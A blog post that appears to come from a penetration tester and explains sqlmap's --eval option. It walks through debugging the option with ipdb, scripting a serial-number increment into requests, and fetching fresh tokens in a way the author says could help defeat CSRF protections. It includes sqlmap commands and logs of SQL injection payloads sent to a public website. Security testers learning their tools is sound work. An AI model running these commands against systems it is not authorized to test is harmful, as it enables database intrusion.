I was always sad when I couldn’t use sqlmap when the injection was not very simple. Of course I always expected that to be my fault, that I didn’t spent enough time to configure sqlmap properly. So the other day when I tested an application and found an sql injection which was a pain in the neck to exploit manually, I rolled up my sleeves and started to look at source code of sqlmap to figure out some parameters which I never knew what they did. This blog post is about the --eval parameter which allows you to manipulate the requests before sending them.

If you look at the sqlmap help, it says the following about --eval:

    --eval=EVALCODE     Evaluate provided Python code before the request (e.g.
                        "import hashlib;id2=hashlib.md5(id).hexdigest()")

This sounds pretty good, but I still had no idea what you can do with it exactly. A good way to find that out is to do a little debugging. If you look at the sqlmap\lib\core\common.py:evaluateCode() method you will see the following:

def evaluateCode(code, variables=None):
    """
    Executes given python code given in a string form
    """
    try:
        exec(code, variables)
    except KeyboardInterrupt:
        raise
    except Exception, ex:
        errMsg = "an error occurred while evaluating provided code ('%s'). " % ex
        raise SqlmapGenericException(errMsg)

This means that your given code is executed with the exec() method. I still didn’t know though,what would be there inside this exec. I wanted to know what can I access and alter with my input code. For the examples here, I am gonna use the form in a W3C example (http://www.w3schools.com/tags/tryit.asp?filename=tryhtml_form_submit), and I will also add some parameters, which are not really existing but it still shows how sqlmap works. So my test request is the following, which is saved in the w3c_post.txt:

POST /tags/demo_form.asp HTTP/1.1
Host: www.w3schools.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.w3schools.com/tags/tryit_view.asp?x=0.604968847923233
Cookie: __utma=119627022.1380380815.1405671958.1405671958.1405671958.1; __utmb=119627022.2.10.1405671958; __utmc=119627022; __utmz=119627022.1405671958.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __gads=ID=187243b56c146e0d:T=1405671959:S=ALNI_MYjoCljcFie0P9TsOfInWm4lnIjOA; ASPSESSIONIDCSTCRCBQ=KMCPDGBAELNBLLBJDDBHDNCP
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

FirstName=Mickey&LastName=Mouse&Serial=1

I added the Serial parameter, because that is gonna be our test scenario. Many applications use serial numbers in requests, and go to an error state if the serial is wrong. That is a huge bummer when you automate testing because you always have to increment this parameter. That is what we are gonna do with sqlmap. So our goal is to get sqlmap to send the attack request always with an incremented serial number.

But first lets debug a bit more. The best way I found to check the possibilies of --eval is to break with a debugger inside the exec(). You can do that with ipdb (if you don’t have it installed: pip install ipdb). So start sqlmap with the following configuration:

PS H:\My Documents\testing\sqlmapproject-sqlmap-33b6d18> python.exe .\sqlmap.py -l .\w3c_post.txt -v 6 --level=5 --risk=2 --eval="import ipdb; ipdb.set_trace()"

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused
by this program

[*] starting at 10:46:14

[10:46:14] [DEBUG] cleaning up configuration parameters
[10:46:14] [DEBUG] parsing targets list from '.\w3c_post.txt'
[10:46:14] [DEBUG] not a valid WebScarab log data
[10:46:14] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[10:46:14] [DEBUG] setting the HTTP timeout
[10:46:14] [DEBUG] setting the HTTP method to GET
[10:46:14] [DEBUG] creating HTTP requests opener object
[10:46:14] [DEBUG] initializing the knowledge base
URL 1:
POST http://www.w3schools.com:80/tags/demo_form.asp
Cookie: __utma=119627022.1380380815.1405671958.1405671958.1405671958.1; __utmb=119627022.2.10.1405671958; __utmc=119627022; __utmz=119627022.1405671958.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __gads=ID=187243b56c146e0d:T=1405671959:S=ALNI_MYjoCljcFie0P9TsOfInWm4lnIjOA; ASPSESSIONIDCSTCRCBQ=KMCPDGBAELNBLLBJDDBHDNCP
POST data: FirstName=Mickey&LastName=Mouse&Serial=1
do you want to test this URL? [Y/n/q]
>
[10:46:17] [INFO] testing URL 'http://www.w3schools.com:80/tags/demo_form.asp'
[10:46:17] [INFO] using 'C:\Users\z003am9f\.sqlmap\output\results-07182014_1046am.csv' as the CSV results file in multiple targets mode
[10:46:18] [INFO] testing connection to the target URL
--Return--
None
> <string>(1)<module>()

ipdb>

As you see ipdb broke, and we have a debugging shell inside the exec(). Now the best way to look around is to run locals() to see what is available in that environment. I won’t show that because it is a huge structure, however what you should see hidden between random variables is the POST parameters from your request:

ipdb> print FirstName
Mickey
ipdb> print LastName
Mouse
ipdb> print Serial
1
ipdb>

This is a great thing, because it means that you can directly manipulate the POST parameters from your python code. Now what we need to do is to write a python code which increments the Serial variable. Since I didn’t know how to save state inside python, I went in the hard way and saved the serial counter in a file. The not-too-sophisticated code to do that is:

f = open("cnt.txt","r+")
Serial = int(f.readline())
f.seek(0,0)
f.write(str(Serial+1))
f.close()

It opens the file where the serial number is stored, updates the Serial variable, and increments the number in the file. So let’s try it with sqlmap (note: be careful with the quotes in your python code):

$ python.exe .\sqlmap.py -l .\w3c_post.txt -v 6 --level=5 --risk=2 --eval="f = open('cnt.txt','r+'); Serial = int(f.readline()); f.seek(0,0); f.write(str(Serial+1)); f.close()"

In the following snippet from the logs you can clearly see that the Serial was always properly incremented:

[11:16:09] [PAYLOAD] Mickey') AND 8899=1627
[11:16:09] [TRAFFIC OUT] HTTP request [#10]:
POST /tags/demo_form.asp HTTP/1.1
Accept-language: en-US,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: www.w3schools.com
Referer: http://www.w3schools.com/tags/tryit_view.asp?x=0.604968847923233
Cookie: __utma=119627022.1380380815.1405671958.1405671958.1405671958.1; __utmb=119627022.2.10.1405671958; __utmc=119627022; __utmz=11962702.1405671958.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __gads=ID=187243b56c146e0d:T=1405671959:S=ALNI_MYjCljcFie0P9TsOfInWm4lnIjOA; ASPSESSIONIDCSTCRCBQ=KMCPDGBAELNBLLBJDDBHDNCP
Content-type: application/x-www-form-urlencoded
Content-length: 67
Connection: close

FirstName=Mickey%27%29%20AND%208899%3D1627&LastName=Mouse&Serial=14

[11:16:09] [TRAFFIC IN] HTTP response [#10] (200 OK):
[11:16:09] [PAYLOAD] Mickey' AND 3958=8005
[11:16:09] [TRAFFIC OUT] HTTP request [#11]:
POST /tags/demo_form.asp HTTP/1.1
Accept-language: en-US,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: www.w3schools.com
Referer: http://www.w3schools.com/tags/tryit_view.asp?x=0.604968847923233
Cookie: __utma=119627022.1380380815.1405671958.1405671958.1405671958.1; __utmb=119627022.2.10.1405671958; __utmc=119627022; __utmz=11962702.1405671958.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __gads=ID=187243b56c146e0d:T=1405671959:S=ALNI_MYjCljcFie0P9TsOfInWm4lnIjOA; ASPSESSIONIDCSTCRCBQ=KMCPDGBAELNBLLBJDDBHDNCP
Content-type: application/x-www-form-urlencoded
Content-length: 64
Connection: close

FirstName=Mickey%27%20AND%203958%3D8005&LastName=Mouse&Serial=15

[11:16:09] [TRAFFIC IN] HTTP response [#11] (200 OK):
[11:16:09] [PAYLOAD] Mickey' AND 7730=7730
[11:16:09] [TRAFFIC OUT] HTTP request [#12]:
POST /tags/demo_form.asp HTTP/1.1
Accept-language: en-US,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: www.w3schools.com
Referer: http://www.w3schools.com/tags/tryit_view.asp?x=0.604968847923233
Cookie: __utma=119627022.1380380815.1405671958.1405671958.1405671958.1; __utmb=119627022.2.10.1405671958; __utmc=119627022; __utmz=11962702.1405671958.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __gads=ID=187243b56c146e0d:T=1405671959:S=ALNI_MYjCljcFie0P9TsOfInWm4lnIjOA; ASPSESSIONIDCSTCRCBQ=KMCPDGBAELNBLLBJDDBHDNCP
Content-type: application/x-www-form-urlencoded
Content-length: 64
Connection: close

FirstName=Mickey%27%20AND%207730%3D7730&LastName=Mouse&Serial=16

With that we’ve reached our goal.

To go a bit further, I would like to add a more complicated example where you could see the real power in this feature. In my test, the new serial number was always embedded in the last response. The problem was that sometimes the system broke and my serials went out of sync. So I decided that it would be better to send a useless request to get a fresh serial number and use that in the attack request. Of course it slows down the test because it doubles the number of requests, but on the other hand it goes in the direction of beating CSRF protections, which could be also really useful.

The following code creates a method which is responsible to get the newest serial number:

#!/usr/bin/env python
import httplib
from StringIO import StringIO
import gzip
from lxml import html

def getSerial():
     conn = httplib.HTTPSConnection("www.w3schools.com")
     headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
     "Accept-Language": "en-US,en;q=0.5",
     "Accept-Encoding": "gzip, deflate",
     "Referer": "https://www.w3schools.com/tags/demo_form.asp",
     "Connection": "keep-alive"}
     conn.request("GET", "/tags/demo_form.asp", None, headers)
     resp = conn.getresponse()
     buffer = StringIO(resp.read())
     deflatedContent = gzip.GzipFile(fileobj=buffer)
     content_text = deflatedContent.read()
     content_tree = html.fromstring(content_text)
     serial_number = content_tree.xpath('//input[@name="Serial"]/@value')
     conn.close()

     return serial_number[0]

Note that this is not gonna work because W3C doesn’t replies with a serial number, it is a mere example.

In the getSerial() method, we open a connection to the target server, set up the headers, send the request. Since the response was compressed in my case, it had to be decompressed and parsed to retrieve the new Serial.

This code was saved in the increment.py, thus it could be used as a library in the --eval:

python.exe .\sqlmap.py -l .\w3c_post.txt -v 6 --level=5 --risk=2 --eval="import increment; Serial=increment.getSerial()"

As I said, this is not a working example, but I think you can see the potential in it.

So that is about scripting sqlmap so far, have fun with it.